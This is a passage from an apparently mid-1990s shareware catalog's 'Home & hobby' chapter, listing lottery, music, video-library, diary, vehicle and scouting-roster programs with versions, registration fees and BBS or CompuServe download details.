813-766-0780 to download it + at no charge); PROPH5.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 9 (or contact userID 71251,2123 for assistance); + PROPHET5.ZIP on GEnie in IBM forum LIBrary 7 (or contact userID + GDAVIS13 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Lotto Prophet Ver 5.0 Provides more HOT statistical algorithms + than any lottery program on the market today and has a history + of picking BIG winners. New instant State of Lottery Report. + Supports Pick 5,6,7, Keno & PowerBall. Reports by Trips, Quads, + PowerDue, Hot, Overdue, Most Likely, Friends & Fate. Complete + Data File Control. Wheeling Systems. Picks, Stores & Checks for + WINNERS. LP has had winners in the USA, New Zealand, Canada, + Australia, Cyprus & Ireland. + + + Product: Lotto Thunder (PICK-6 Version) + Author: Charles P.Staats + Version: 1.4 (05-01-95) + Needs: IBM PC, DOS 5.0 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Epson printer; + EMS memory; XMS memory. + Registration fee: $20.00 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + CompuServe, newsletter, mail support; runtime license; + discounts on other products. + Look for: LOTTOT14.ZIP on BBSs; LOTT14.ZIP on CompuServe in + CIS:PCFUN forum LIBrary 9 (or contact userID 72747,2474 for + assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A complete lotto prediction and number systems program. Has + four completely different methods of predicting lotto numbers. + Wheel systems up to 54 numbers, multiple level predictions, + save predictions, scan for winners, scan for past performance, + auto and manual execution of prediction methods, no game limit. + Pull down menus, in-memory scanning, support for expanded + memory. Graphs, pie, bar, line, and time-series graphs. + + Chapter 15, "Home & hobby" 625 + + + + Product: Windows Lotto + Author: Data Solutions, 813-653-3093 + Version: 1.1 (05-01-94) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; Epson printer; VBRUN100.DLL. + Registration fee: $35.95 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; bonus data; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. + Look for: WINLOT11.ZIP on BBSs (call 813-653-4034 to download it + at no charge); WINLOT.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 9 (or contact userID 72356,354 for assistance). + SWREG#: 2581 + PsL#: 11327 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Picks the best numbers to play based on a statistical analysis + of previously drawn lottery numbers. The numbers picked can be + played in any of the 24 wheeling systems that are included. You + can substitute your own systems if desired. Checks game tickets + for winning matches. Many statistical charts and graphs are + included that help to handicap the lottery numbers. Works with + all lotteries that pick 5, 6 or 7 numbers, including Powerball. + + + 15.15 Movies & video tapes + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 700. + + Product: Music and Video Librarian v3.8 + Author: Alpine Software, 214-964-1897 + Version: 3.8 (08-24-93) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $29.95 + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; MVL.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 73770,3273 for + assistance). + Download size: 260k (about 20 minutes with a 2400 baud modem) + Description: + Ideal tool for Audiophiles and video collectors. Organize + music (all types) and video collections, Hi-Fi and video + equipment, plus a radio station directory. Fully customizable + including screen color slection, user defined report writer to + allow you to design your own reports plus much more. + + Chapter 15, "Home & hobby" 626 + + + + Product: Video Librarian + Author: TurboSystemsCo, 404-516-8575 + Version: 4.02 (12-31-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie, + mail support; bonus data; discounts on other products. + Look for: VLB402.ZIP on BBSs (call 703-680-9269 to download it at + no charge); VLB.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); VLB402.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 273k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Full featured menu-driven database manager that catalogs video + libraries like no other. 14 database management functions + available from data entry screen. Holds 18 fields of + information about each title. Has very fast search and find + routines. Prints reports to the screen, printer or disk. Prints + labels on regular or custom labels for cassettes. Mouse + support, context sensitive help, moveable, re-sizeable browse/ + find screens. Memo field for movie synopsis. + + + Product: VideoMaster + Helping you *master your video collection. See full + description on page 590. + + Product: VideoMaster For Windows + Helping you *master your video collection. See full + description on page 591. + + + 15.16 Music + + See also: Education, Music. + + Chapter 15, "Home & hobby" 627 + + + + Product: ACCU Music System + Author: Kevin J. Fischer + Version: 3.4 (05-05-93) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited mail support. Next program + version with documentation; code to disable begging screens; + discount upgrades. + Look for: AC34MUSC.ZIP on BBSs (call 619-566-1745 to download it + at no charge); MUSC34.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 4. + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + Includes everything needed to create music on your computer: + * editor lets you enter notes & see them on the screen as + well (graphics or text) + * transposer changes the key signature of your music & + raises/lowers your music by half steps + * prints your music in sheet music format on a printer + * music player for playing on the PC speaker or a sound card + * multiple voice songs; .ROL file converter (to/from); more + + + Product: AlbumMaster + Easily catalog your album collection. See full description on + page 584. + + Product: AlbumMaster For Windows + Helps you *Master your album library. See full description on + page 584. + + Product: AMF Intelligent Organ for Win + Author: AMF Shareware Productions + Version: 1.0 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. sound card. + Registration fee: $11.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: ORGAN.ZIP on BBSs; ORGAN.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 7 (or contact userID 74250,1700 for + assistance). + SWREG#: 3236 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + A Casio-like organ synthesizer for Windows. Play 127 + instruments in 5 octaves with your mouse. Has recording and + playback capabilities. When playing back, it actually looks + + Chapter 15, "Home & hobby" 628 + + + + like someone is playing the piano. Easy to use. Realistic- + looking keyboard. + + + Product: CassetteMaster + The best way to catalog your cassettes. See full description + on page 586. + + Product: CassetteMaster For Windows + The best way to catalog your cassettes. See full description + on page 586. + + Product: CD-Box + Author: Jeffrey Belt, 415-497-5573 + Version: 3.03B (08-11-93) + Needs: IBM AT (80286), DOS 3.3 or better. 640k RAM; VGA monitor; + Mouse. AdLib or SoundBlaster card. + Strongly recommended: Hard disk. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of unlimited phone, mail support; 6-month return policy; + bonus utilities; discounts on other products. + Look for: CDBOX303.ZIP on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A VGA/mouse player/playback shell to play music on an AdLib or + SoundBlaster card (or better). It provides a common high-level + interface to multiple sound file formats (.CMF .MID .MOD .MUS + .ROL .VOC .WAV and user-defined) with extras: pause & repeat & + volume control, multiple and random song selection, automatic + handling of bank files, song titles and lengths, playback from + .ARC, .ARJ, .PAK and .ZIP archives, nice graphics and funny + animations! + + + Product: CDMaster + Helping you to *master your CD library. See full description + on page 587. + + Product: CDMaster For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 3.10 (01-29-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; VGA monitor; + Dual 720k floppy drives; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; bonus graphics; all + + Chapter 15, "Home & hobby" 629 + + + + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + Look for: CDMW310.ZIP on BBSs (multiple files) (call 317-784-2147 + to download it at no charge); CDM4W.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (multiple files) (or contact userID + 70272,3317 for assistance). + Download size: 856k (about 64 minutes with a 2400 baud modem) + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and powerful. Standard entries for title, + artist, CD number, category, and tunes (plus 3 user defined + fields! The user can obtain printouts for all or criteria, and + can search for all fields or combination, even tunes! Printouts + include: an abbreviated listing, full catalog, 3X5 and Rolodex + cards, front labels, and 3 different styles of complete tune + lists! + + + Product: CDPlayer for Windows and DOS + Author: Jupiter Software, +44-081-946-4826 + Version: 3.4 (10-31-93) + Needs: IBM PC, DOS 3.3 or better. 400k RAM. + Strongly recommended: Hard disk; Mouse. Sound card. + Registration fee: L-15.00 (add L-6.00 for shipping to U.S. + addresses) (add L-6.00 for shipping to Canadian addresses) (add + L-6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus utilities. Lifetime free upgrading + allowed. + Look for: CDPLAY34.ZIP on BBSs (call 215-623-6203 to download it + at no charge); CDPJ.ZIP on CompuServe in CIS:CDROM forum + LIBrary 4 (or contact userID 100140,2134 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + All the functions associated with a normal CD player, together + with the ability to catalog and search your collection. + * Custom, single track & shuffle play/repeat + * Fit tracks to time for recording + * Track skip, music search, replay track & pause + * On screen volume + * Multiple CDROM support + * Disc catalogue: disc name, composer/artist, music type, + disc reference, track details + * Browse catalog - word search + * Elapsed/remaining times + * Small handset toggle + + Chapter 15, "Home & hobby" 630 + + + + Product: LUDWIG + Author: Feico Nater Shareware, 31-74-438373 + Version: 1.0 (01-01-92) + Needs: IBM AT (80286), DOS 2.0 or better. VGA monitor, mouse. + Registration fee: $0.00 + Registration benefits: Phone/mail support, free updates. + Look for: LUDWIG.* on BBSs; LUDWIG.* on GEnie in 0 forum LIBrary + 0. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Editor for musical notes. Eight notes can sound + simultaneously. Five clefs available (including double-stave + for piano). Sharps, Flats and Naturals automatically inserted + where needed. Double Sharps and Double Flats available. Usage + of Function keys equal to WordPerfect. + + + Product: MCBase + Relational music collection database system. See full + description on page 588. + + Product: Melissa's Music Flashcards + Author: Fischer Grafix & Software, 714-898-7262 + Version: 3.1 (10-28-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FGSMMF.ZIP on BBSs; FGSMMF.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 70233,1315 for + assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Description: + Kids of all ages can learn to read music. You can set the type + of note that appears on the screen from flats to sharps. The + program will acknowledge if your choice is correct by smiling + at you or if your selection was wrong it will cry. The program + was written to add some fun to the drudgery of trying to learn + music. The program also includes a hint feature which shows the + correct key on the piano keyboard. Also includes 6 pre-made + song to play. + + + Product: MicroPlayerCD(tm) + Play audio CDs on your computer's CDROM drive. See full + description on page 85. + + Chapter 15, "Home & hobby" 631 + + + + Product: MOZART (Virtuoso Edition) + Author: David Webber + Version: 1.3 (01-03-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM. + Registration fee: $49.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of CompuServe, mail support; bonus data; + discounts on upgrades. Scores up to 64 staves; illustrated + help. + Look for: MOZART13.ZIP on BBSs; MOZART.ZIP on CompuServe in + CIS:MUSICA forum LIBrary 12 (or contact userID 100042,3516 for + assistance). + SWREG#: 4080 + Download size: 2000k (about 149 minutes with a 2400 baud modem) + Description: + A music processor for Windows 3.1. Using only the computer + keyboard, you can create, edit and print sheet music with high- + quality TrueType symbols. WYSIWYG. Its primary aim is to print + parts for musicians, but MIDI files can be exported to provide + an "aural preview" on multimedia PCs. Features include: instant + transposition; automatic default quaver (eighth note) tail + groupings; automatic bar-line entry; optional "swing" + interpretation; on-line help. + + + Product: Music Sculptor for Windows + Author: Aleph Omega Software, 403-257-2115 + Version: 1.4 (03-07-94) + Needs: IBM AT (80286), Windows 3.1 or better. 200k RAM; CGA + monitor; Mouse; sound card. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $24.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; lifetime return policy; bonus utilities; bonus data; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. + Look for: MUSIC14.ZIP on BBSs; MUS14.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 6 (or contact userID 72613,3574 for + assistance). + PsL#: 11251 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A very easy to use MIDI sequencer with music keyboard window. + Record, edit, and play music. Works with any Windows- + compatible sound card or MIDI interface. Use with either + external MIDI keyboard or music keyboard window which can be + played using mouse or computer keyboard. Attractive and fully + functional. MIDI files included. + + Chapter 15, "Home & hobby" 632 + + + + Product: Musical Instrument Tuner + Author: SoundByte Software, 317-856-3860 + Version: 1.01 (02-23-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; Epson printer; sound card. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited phone, mail support. + Look for: TUNER101.ZIP on BBSs. + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Creates reference tones for tuning various musical instruments + such as guitar, banjo, violin and mandolin. There is also a + large selection of scales available for tuning other + instruments. Works with Sound Blaster or the PC speaker. + + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 540. + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 541. + + Product: MusicEase + Author: RMH Computer Services, 317-782-9903 + Version: 4.11 (10-25-94) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; bonus utilities; all ASP- + wide offers (see page 6); discounts on other products. + Look for: ME411.ZIP on BBSs (call 317-784-2147 to download it at + no charge); MUSCEZ.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 4 (or contact userID 73567,1547 for assistance). + SWREG#: 1371 + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + Formerly a successful commercial product, this music score + editor lets you create, edit, print and play music notation. + WYSIWYG screen oriented editor providing a constraint based + system with a large amount of knowledge of music notation. Will + intelligently handle many of the details of scoring + automatically. Can create professional looking scores easily + and quickly. Enter notes using the computer keyboard or by + + Chapter 15, "Home & hobby" 633 + + + + playing them on a MIDI instrument (MPU-401 only). Can + transpose, invert and retrograde. + + + Product: NoteWorthy + Author: Braeburn Software, +44-1750-721854 + Version: 1.87 (12-29-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; EGA monitor; + Hercules monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Registration fee: L-40.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; discounts on upgrades. + Look for: NW187*.ZIP on BBSs; NW187*.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 5 (or contact userID 100415,3372 for + assistance). + SWREG#: 3764 + PsL#: 11597 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + WYSIWYG music editor for the professionally-minded musician. + DOS-based, and supports Epson, IBM Proprinter, Canon, + Postscript, Laserjet, Canon LBP printers. Full set of musical + symbols on staves bound in any fashion into systems. Four fonts + for text work, justification and compression of staves. + Transposition (including any chord symbols used) and straight + lines and curves. Very easy interface, inc demonstration mode + and on-line tutorial. Does not play music, but is a high- + quality printing system. + + + Product: Relor Rhyming Dictionary + Type in a word & program displays rhyme words. See full + description on page 242. + + Product: SoundMasterDb + Author: TurboSystemsCo, 404-516-8575 + Version: 2.02 (09-14-92) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $31.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 51/4" master disk(s); 3 months of support; + discounts on other products; discounts on upgrades. + Look for: SND202.ZIP on BBSs (call 703-680-9269 to download it at + no charge); SND.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); SND202.ZIP on + + Chapter 15, "Home & hobby" 634 + + + + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + Top rated audio librarian available. Handles all audio formats + (CDs, cassettes, albums, etc.) through its relational database + design. Advanced data input/display screen stores an unlimited + number of songs per side. Nine reports that can be indexed 6 + ways. Lists reports to screen, printer or disk. Quick find/ + search on single or multiple fields. Features context sensitive + help, online manual, screen saver, mouse support and much more. + + + Product: SoundZ + The ultimate music librarian. See full description on + page 589. + + Product: SoundZ For Windows + The ultimate music librarian. See full description on + page 590. + + + 15.17 Personalities + + Product: By the Numbers [***] + Personality analysis with Numerology. See full description on + page 594. + + Product: ESPTEST + Parapsychology tool. See full description on page 542. + + Product: JailBird + Create & print vanity license plate replicas. See full + description on page 559. + + Product: RagTime for Windows + Event & recreation planner for women (& guys). See full + description on page 151. + + Chapter 15, "Home & hobby" 635 + + + + Product: The Richard Webster System [***] + Author: R.K. West Consulting + Version: 4.0 (05-16-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; HP LaserJet + printer. + Registration fee: $0.00 + Registration benefits: + Look for: WEB40.ZIP on BBSs; WEBSTR.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Based on the work of internationally-know psychic entertainer + Richard Webster, "Aura Reading" helps you learn what to look + for when attempting to see the human aura. "Quick Numerology" + helps you put together a short but pointed personality profile + using someone's date of birth. It's a fascinating way to + understand more about those around you. Great fun at parties! + + + Product: Your ESP Test [***] + Find out if you have psychic powers! See full description on + page 598. + + 15.17.1 Diaries & journals + + Product: Dear Diary + Diary/daily journal. See full description on page 180. + + Product: My Life + Author: JRE Enterprises + Version: 2.2 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $32.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: MYL22.ZIP on BBSs (call 602-814-0483 to download it at + no charge); MYL22.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 2155 + Download size: 1405k (about 105 minutes with a 2400 baud modem) + Description: + A personal diary, journal, scrapbook, and word processor for + Windows. The scrapbook can be used to store and play movies and + sounds. Pictures can also be stored and viewed. Multiple + + Chapter 15, "Home & hobby" 636 + + + + databases can be created, one for each member of the family, + and each database can be password protected. + + + 15.18 Photography + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 579. + + + 15.19 Planes, trains & automobiles + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 275. + + Product: Chris's Automobile Recorder + Author: Cooney Applied Technology + Version: 13.2 (01-08-94) + Needs: IBM PC, DOS 3.3 or better. 300k RAM; Dual 720k floppy + drives. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: lifetime BBS, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: CAR132.ZIP on BBSs (call 513-274-0821 to download it at + no charge); CAR132.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 71001,1370 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Operation, maintenance, and inspection logger and reminder for + vehicles and machines. Quick & easy to use, yet 100% + comprehensive & powerful. Has context-sensitive pop-up help + and a 51 p. manual. Reminders, reports, and graphs help you + operate reliably and economically. Detailed, printed logs add + value at resale time. Supports metric, foreign currencies, + multiple vehicles & machines. The best program of its class at + any price. + + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 340. + + + 15.20 Quotes & anecdotes + + See also: Data, Quotes & anecdotes. + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 434. + + Chapter 15, "Home & hobby" 637 + + + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 682. + + + 15.21 Reading (and writing, too) + + Product: Creativity Package [***] + Become more creative & improve your writing. See full + description on page 249. + + Product: Daily Log Book + Diary or Journal. See full description on page 180. + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 700. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 514. + + Product: Poetry Generator [***] + Turn your computer into a poet! See full description on + page 250. + + Product: SNAKE + Author: Chatfield Software, Inc., 216-632-5447 + Version: 1.0 (10-01-94) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $6.00 + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, GEnie, newsletter, mail support; 1-month + return policy; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Shareware copy of next disk in series; 10% discount of other + Chatfield Software products. + Look for: availability unknown on BBSs. + Download size: 772k (about 58 minutes with a 2400 baud modem) + Description: + "Art-for-art's-sake" poetry. + + + 15.22 Scouting + + See also: Home & hobby, Sports, Firearms; Home & hobby, Hunting + & fishing. + + Chapter 15, "Home & hobby" 638 + + + + Product: ARROW TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 2.0 (05-31-94) + Needs: IBM PC, DOS 3.3 or better. 490k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: ARTR20.ZIP on BBSs; ARTR20.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 305k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu driven program designed for OA Chapter use which stores + member info, dues status, committee assignments, honors, and + participation. Produces labels and multiple rosters, individual + records for each member as well as events and attendance + summary. Lodge Registration gets copies for all chapters plus + consolidation program. + + + Product: GS TROOP TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.1 (11-15-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy. + 1 free update disk(s) sent out. + Look for: GSTR11.ZIP on BBSs; GSTR11.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 10014,2347 for + assistance). + Download size: 285k (about 21 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu driven program which stores a unit roster, registration + record, camping experience, service record, leadership served, + achievements attained, any/all training received, and details + of all unit events and trips. Will generate girl and leader + rosters plus a roster of former unit members; three different + types of mailing labels; an individual record for each girl or + leader; and other reports detailing honors in the unit and + skill mix of the unit. + + Chapter 15, "Home & hobby" 639 + + + + Product: MERIT BADGE TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 3.1 (12-04-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Hard disk. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + CompuServe, mail support; 3-month limited return policy. 1 + free update disk(s) sent out. + Look for: MBTR30.ZIP on BBSs; MBTR30.ZIP on CompuServe in + CIS:OUTDOORS forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 292k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu-driven program which stores a district or council merit + badge counselor roster and the specific merit badges and/or any + other skills that a specific counselor is registered to + counsel. Program will generate several administrative counselor + rosters, a roster of merit badges and counselors (with address + and telephone number) to be distributed to units, and an annual + verification letter to each counselor. + + + Product: POST TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.0 (01-27-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 6). 1 free update disk(s) sent out. + Look for: POTR10.ZIP on BBSs; POTR10.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 309k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu-driven program which stores Post roster, attendance, + participation, Post offices, and training data. For boys who + are continuing to work on Eagle Scout, it also stores complete + Scout history; i.e., Merit Badges earned, advancement received, + troop offices, etc. Produces adult and explorer rosters, a + roster of former members, mailing labels, an individual record, + a post telephone call sheet and participation points summary. + + Chapter 15, "Home & hobby" 640 + + + + Product: SHIP TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.2 (03-15-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + CompuServe, mail support; 3-month limited return policy. 1 + free update disk(s) sent out. + Look for: SHTR12.ZIP on BBSs; SHTR12.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 10014,2347 for + assistance). + Download size: 228k (about 17 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Stores ship's roster, advancment data, participation data, + ship's offices served, meetings attended, and all training + data. Generates scout and scouter rosters, roster of former + ship's members, 3 types of mailing labels, an individual + records for each member, and an attendance summary for all + scouts. + + + Product: TRAINING TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 2.0 (04-14-94) + Needs: IBM PC, DOS 2.0 or better. 400k RAM; Hard disk. + Strongly recommended: Dual 720k floppy drives; HP DeskJet + printer; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: TNTR20.ZIP on BBSs; TNTR20.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 10014,2347 for + assistance). + Download size: 292k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Upon input of all unit data, all unit rosters, and the logging + of all training attendance reports submitted to a training + chair, program will generate district scouter rosters (trained + and untrained), a roster of former district scouters with their + training status, 3 types of mailing labels, an individual + training records for each scouter, a district training summary, + unit inventory of training for each unit, a district summary of + trained leaders, and a training status of top leaders report. + + Chapter 15, "Home & 